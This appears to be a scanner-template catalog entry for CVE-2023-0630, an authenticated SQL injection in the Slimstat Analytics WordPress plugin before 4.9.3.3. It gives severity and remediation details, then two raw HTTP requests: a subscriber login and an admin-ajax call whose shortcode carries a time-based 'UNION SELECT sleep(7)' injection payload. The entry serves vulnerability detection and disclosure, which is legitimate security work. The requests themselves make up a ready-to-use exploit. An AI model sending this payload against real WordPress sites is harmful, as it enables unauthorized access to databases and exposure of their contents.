| Title | Slimstat Analytics < 4.9.3.3 Subscriber - SQL Injection |
|---|---|
| Author | DhiyaneshDK |
| Severity | High |
| Impact | Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database, potentially exposing sensitive information. |
| Remediation | Fixed in version 4.9.3.3 |
| CVSS Score | 8.8 |
| EPSS Score | 0.92822 |
| CVE ID | CVE-2023-0630 |
| CWE ID | CWE-89 |
| Tags | time-based-sqli cve2023 cve wpscan wp-slimstat wp wp-plugin sqli wordpress authenticated vuln |
The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query.
POST /wp-login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_16) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15
Connection: close
Content-Length: 51
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
log=vKF8oP&pwd=k4gwwT&wp-submit=Log+In&testcookie=1
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Content-Length: 114
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
action=parse-media-shortcode&shortcode=[slimstat f="count" w="author"]WHERE:1 UNION SELECT sleep(7)-- a[/slimstat]
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-0630.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-0630.pcap
N/AN/A